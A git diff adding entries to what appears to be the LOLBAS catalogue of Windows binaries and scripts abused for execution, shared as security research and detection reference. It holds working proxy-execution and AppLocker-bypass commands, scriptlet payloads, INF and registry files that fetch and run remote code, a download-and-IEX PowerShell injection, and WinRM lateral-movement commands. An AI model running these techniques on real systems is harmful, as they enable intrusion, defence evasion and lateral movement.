+  - https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
+  - https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+  - https://twitter.com/bohops/status/997690405092290561
+Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
diff --git a/OSLibraries/Mshtml.yml b/OSLibraries/Mshtml.yml
new file mode 100644
index 0000000..cf87275
--- /dev/null
+++ b/OSLibraries/Mshtml.yml
@@ -0,0 +1,17 @@
+---
+Name: Mshtml.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
+    Description: Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
+Full Path:
+  - c:\windows\system32\Mshtml.dll
+  - c:\windows\sysWOW64\Mshtml.dll
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/998567549670477824
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OSLibraries/Payload/Advpack.inf b/OSLibraries/Payload/Advpack.inf
new file mode 100644
index 0000000..97e3ecb
--- /dev/null
+++ b/OSLibraries/Payload/Advpack.inf
@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"
\ No newline at end of file
diff --git a/OSLibraries/Payload/Advpack_calc.sct b/OSLibraries/Payload/Advpack_calc.sct
new file mode 100644
index 0000000..a167c12
--- /dev/null
+++ b/OSLibraries/Payload/Advpack_calc.sct
@@ -0,0 +1,44 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee --> 
+        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>
\ No newline at end of file
diff --git a/OSLibraries/Payload/Ieadvpack.inf b/OSLibraries/Payload/Ieadvpack.inf
new file mode 100644
index 0000000..97e3ecb
--- /dev/null
+++ b/OSLibraries/Payload/Ieadvpack.inf
@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"
\ No newline at end of file
diff --git a/OSLibraries/Payload/Ieadvpack_calc.sct b/OSLibraries/Payload/Ieadvpack_calc.sct
new file mode 100644
index 0000000..a167c12
--- /dev/null
+++ b/OSLibraries/Payload/Ieadvpack_calc.sct
@@ -0,0 +1,44 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee --> 
+        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>
\ No newline at end of file
diff --git a/OSLibraries/Pcwutl.yml b/OSLibraries/Pcwutl.yml
new file mode 100644
index 0000000..15e4887
--- /dev/null
+++ b/OSLibraries/Pcwutl.yml
@@ -0,0 +1,17 @@
+---
+Name: Pcwutl.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
+    Description: Launch executable by calling the LaunchApplication function.
+Full Path:
+  - c:\windows\system32\Pcwutl.dll
+  - c:\windows\sysWOW64\Pcwutl.dll
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/harr0ey/status/989617817849876488
+Notes: Thanks to Matt harr0ey - @harr0ey
diff --git a/OSLibraries/Setupapi.yml b/OSLibraries/Setupapi.yml
new file mode 100644
index 0000000..626fb42
--- /dev/null
+++ b/OSLibraries/Setupapi.yml
@@ -0,0 +1,25 @@
+---
+Name: Setupapi.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
+    Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
+  - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
+    Description: Remote fetch and execute a COM Scriptlet by calling an information file directive.
+Full Path:
+  - c:\windows\system32\Setupapi.dll
+  - c:\windows\sysWOW64\Setupapi.dll
+Code Sample:
+  - https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
+  - https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
+  - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/994742106852941825
+  - https://twitter.com/subTee/status/951115319040356352
+  - https://twitter.com/KyleHanslovan/status/911997635455852544
+  - https://github.com/huntresslabs/evading-autoruns
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)
diff --git a/OSLibraries/Shdocvw.yml b/OSLibraries/Shdocvw.yml
new file mode 100644
index 0000000..33023d7
--- /dev/null
+++ b/OSLibraries/Shdocvw.yml
@@ -0,0 +1,22 @@
+---
+Name: Shdocvw.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
+    Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+  - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
+    Description: Renamed URL file.
+Full Path:
+  - c:\windows\system32\Shdocvw.dll
+  - c:\windows\sysWOW64\Shdocvw.dll
+Code Sample:
+  - https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
+  - https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+  - https://twitter.com/bohops/status/997690405092290561
+Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops
diff --git a/OSLibraries/Shell32.yml b/OSLibraries/Shell32.yml
new file mode 100644
index 0000000..030887f
--- /dev/null
+++ b/OSLibraries/Shell32.yml
@@ -0,0 +1,24 @@
+---
+Name: Shell32.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll
+    Description: Launch DLL payload.
+  - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
+    Description: Launch executable payload.
+  - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
+    Description: Launch executable payload with arguments.
+Full Path:
+  - c:\windows\system32\shell32.dll
+  - c:\windows\sysWOW64\shell32.dll
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Hexacorn/status/885258886428725250
+  - https://twitter.com/pabraeken/status/991768766898941953
+  - https://twitter.com/mattifestation/status/776574940128485376
+  - https://twitter.com/KyleHanslovan/status/905189665120149506
+Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)
diff --git a/OSLibraries/Syssetup.yml b/OSLibraries/Syssetup.yml
new file mode 100644
index 0000000..8612289
--- /dev/null
+++ b/OSLibraries/Syssetup.yml
@@ -0,0 +1,24 @@
+---
+Name: Syssetup.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
+    Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
+  - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
+    Description: Remote fetch and execute a COM Scriptlet by calling an information file directive.
+Full Path:
+  - c:\windows\system32\Syssetup.dll
+  - c:\windows\sysWOW64\Syssetup.dll
+Code Sample:
+  - https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
+  - https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
+  - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/994392481927258113
+  - https://twitter.com/harr0ey/status/975350238184697857
+  - https://twitter.com/bohops/status/975549525938135040
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)
diff --git a/OSLibraries/Url.yml b/OSLibraries/Url.yml
new file mode 100644
index 0000000..0c1221f
--- /dev/null
+++ b/OSLibraries/Url.yml
@@ -0,0 +1,33 @@
+---
+Name: Url.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
+    Description: Launch a HTML application payload by calling OpenURL.
+  - Command: rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
+    Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+  - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+    Description: Launch an executable payload by calling OpenURL.
+  - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
+    Description: Launch an executable payload by calling FileProtocolHandler.
+  - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
+    Description: Launch a HTML application payload by calling FileProtocolHandler.
+  - Command: rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+    Description: Launch an executable payload by calling FileProtocolHandler.
+
+Full Path:
+  - c:\windows\system32\url.dll
+  - c:\windows\sysWOW64\url.dll
+Code Sample:
+  - https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
+Detection: []
+Resources:
+  - https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+  - https://twitter.com/bohops/status/974043815655956481
+  - https://twitter.com/DissectMalware/status/995348436353470465
+  - https://twitter.com/yeyint_mth/status/997355558070927360
+  - https://twitter.com/Hexacorn/status/974063407321223168
+Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)
diff --git a/OSLibraries/Zipfldr.yml b/OSLibraries/Zipfldr.yml
new file mode 100644
index 0000000..85e6eb9
--- /dev/null
+++ b/OSLibraries/Zipfldr.yml
@@ -0,0 +1,20 @@
+---
+Name: Zipfldr.dll
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
+    Description: Launch an executable payload by calling RouteTheCall.
+  - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+    Description: Launch an executable payload by calling RouteTheCall.
+Full Path:
+  - c:\windows\system32\zipfldr.dll
+  - c:\windows\sysWOW64\zipfldr.dll
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/moriarty_meng/status/977848311603380224
+  - https://twitter.com/bohops/status/997896811904929792
+Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)
diff --git a/OSScripts/CL_mutexverifiers.yml b/OSScripts/CL_mutexverifiers.yml
new file mode 100644
index 0000000..f8189b7
--- /dev/null
+++ b/OSScripts/CL_mutexverifiers.yml
@@ -0,0 +1,18 @@
+---
+Name: CL_Mutexverifiers.ps1
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1"
+    Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
+Full Path:
+  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
+  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/995111125447577600
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)
diff --git a/OSScripts/Cl_invocation.yml b/OSScripts/Cl_invocation.yml
new file mode 100644
index 0000000..895c775
--- /dev/null
+++ b/OSScripts/Cl_invocation.yml
@@ -0,0 +1,20 @@
+---
+Name: CL_Invocation.ps1
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
+    Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
+Full Path:
+  - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
+  - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
+  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
+Code Sample: []
+Detection: []
+Resources:
+  - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
+  - https://twitter.com/bohops/status/948548812561436672
+  - https://twitter.com/pabraeken/status/995107879345704961
+Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)
diff --git a/OSScripts/Manage-bde.yml b/OSScripts/Manage-bde.yml
new file mode 100644
index 0000000..549d882
--- /dev/null
+++ b/OSScripts/Manage-bde.yml
@@ -0,0 +1,19 @@
+---
+Name: Manage-bde.wsf
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
+    Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
+  - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
+    Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
+Full Path:
+  - C:\Windows\System32\manage-bde.wsf
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+  - https://twitter.com/bohops/status/980659399495741441
+Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)
diff --git a/OSScripts/Payload/Pubprn_calc.sct b/OSScripts/Payload/Pubprn_calc.sct
new file mode 100644
index 0000000..f33fb96
--- /dev/null
+++ b/OSScripts/Payload/Pubprn_calc.sct
@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>
\ No newline at end of file
diff --git a/OSScripts/Payload/Slmgr.reg b/OSScripts/Payload/Slmgr.reg
new file mode 100644
index 0000000..3e4874e
--- /dev/null
+++ b/OSScripts/Payload/Slmgr.reg
@@ -0,0 +1,24 @@
+Windows Registry Editor Version 5.00
+
+[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
+@=""
+
+[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+@="Scripting.Dictionary"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
+@="C:\\WINDOWS\\system32\\scrobj.dll"
+"ThreadingModel"="Apartment"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
+@="Scripting.Dictionary"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
+@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
+@="Scripting.Dictionary"
\ No newline at end of file
diff --git a/OSScripts/Payload/Slmgr_calc.sct b/OSScripts/Payload/Slmgr_calc.sct
new file mode 100644
index 0000000..0fbc2ef
--- /dev/null
+++ b/OSScripts/Payload/Slmgr_calc.sct
@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Scripting.Dictionary"
+    progid="Scripting.Dictionary"
+    version="1"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>
\ No newline at end of file
diff --git a/OSScripts/Pubprn.yml b/OSScripts/Pubprn.yml
new file mode 100644
index 0000000..07c4ccb
--- /dev/null
+++ b/OSScripts/Pubprn.yml
@@ -0,0 +1,20 @@
+---
+Name: Pubprn.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
+    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
+Full Path:
+  - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
+  - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
+Code Sample:
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct
+Detection: []
+Resources:
+  - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - https://github.com/enigma0x3/windows-operating-system-archaeology
+Notes: Thanks to Matt Nelson - @enigma0x3
diff --git a/OSScripts/Slmgr.yml b/OSScripts/Slmgr.yml
new file mode 100644
index 0000000..1946236
--- /dev/null
+++ b/OSScripts/Slmgr.yml
@@ -0,0 +1,20 @@
+---
+Name: Slmgr.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
+    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+Full Path:
+  - c:\windows\system32\slmgr.vbs
+  - c:\windows\sysWOW64\slmgr.vbs
+Code Sample:
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
+Detection: []
+Resources:
+  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - https://www.youtube.com/watch?v=3gz1QmiMhss
+Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee
diff --git a/OSScripts/Syncappvpublishingserver.yml b/OSScripts/Syncappvpublishingserver.yml
new file mode 100644
index 0000000..6183c84
--- /dev/null
+++ b/OSScripts/Syncappvpublishingserver.yml
@@ -0,0 +1,17 @@
+---
+Name: SyncAppvPublishingServer.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
+    Description: Inject PowerShell script code with the provided arguments
+Full Path:
+  - C:\Windows\System32\SyncAppvPublishingServer.vbs
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/monoxgas/status/895045566090010624
+  - https://twitter.com/subTee/status/855738126882316288
+Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee
diff --git a/OSScripts/Winrm.yml b/OSScripts/Winrm.yml
new file mode 100644
index 0000000..d4329dd
--- /dev/null
+++ b/OSScripts/Winrm.yml
@@ -0,0 +1,28 @@
+---
+Name: Winrm.vbs
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
+    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+  - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
+  - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
+Full Path:
+  - C:\windows\system32\winrm.vbs
+  - C:\windows\SysWOW64\winrm.vbs
+Code Sample:
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
+Detection: []
+Resources:
+  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - https://www.youtube.com/watch?v=3gz1QmiMhss
+  - https://github.com/enigma0x3/windows-operating-system-archaeology
+  - https://redcanary.com/blog/lateral-movement-winrm-wmi/
+  - https://twitter.com/bohops/status/994405551751815170
+Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)
+
diff --git a/OSScripts/pester.yml b/OSScripts/pester.yml
new file mode 100644
index 0000000..640b59f
--- /dev/null
+++ b/OSScripts/pester.yml
@@ -0,0 +1,18 @@
+---
+Name: pester.bat
+Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Pester.bat [/help|?|-?|/?] "$null; notepad"
+    Description: Execute notepad
+Full Path:
+  - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
+  - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Oddvarmoe/status/993383596244258816
+  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
+Notes: Thanks to Emin Atac - @p0w3rsh3ll
diff --git a/OtherBinaries/AcroRd32.yml b/OtherBinaries/AcroRd32.yml
new file mode 100644
index 0000000..b1b15bf
--- /dev/null
+++ b/OtherBinaries/AcroRd32.yml
@@ -0,0 +1,16 @@
+---
+Name: AcroRd32.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
+    Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
+Full Path:
+  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/997997818362155008
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherBinaries/Gpup.yml b/OtherBinaries/Gpup.yml
new file mode 100644
index 0000000..a327972
--- /dev/null
+++ b/OtherBinaries/Gpup.yml
@@ -0,0 +1,16 @@
+---
+Name: Gpup.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
+    Description: Execute another command through gpup.exe (Notepad++ binary).
+Full Path:
+  - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe    '
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/997892519827558400
+Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
diff --git a/OtherBinaries/Nlnotes.yml b/OtherBinaries/Nlnotes.yml
new file mode 100644
index 0000000..b90b9ce
--- /dev/null
+++ b/OtherBinaries/Nlnotes.yml
@@ -0,0 +1,17 @@
+---
+Name: Nlnotes.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
+    Description: Run PowerShell via LotusNotes.
+Full Path:
+  - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
+  - https://twitter.com/HanseSecure/status/995578436059127808
+Notes: Thanks to Daniel Bohannon - @danielhbohannon
diff --git a/OtherBinaries/Notes.yml b/OtherBinaries/Notes.yml
new file mode 100644
index 0000000..eaa8577
--- /dev/null
+++ b/OtherBinaries/Notes.yml
@@ -0,0 +1,17 @@
+---
+Name: Notes.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
+    Description: Run PowerShell via LotusNotes.
+Full Path:
+  - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
+  - https://twitter.com/HanseSecure/status/995578436059127808
+Notes: Thanks to Daniel Bohannon - @danielhbohannon
diff --git a/OtherBinaries/Nvudisp.yml b/OtherBinaries/Nvudisp.yml
new file mode 100644
index 0000000..d4a9cfa
--- /dev/null
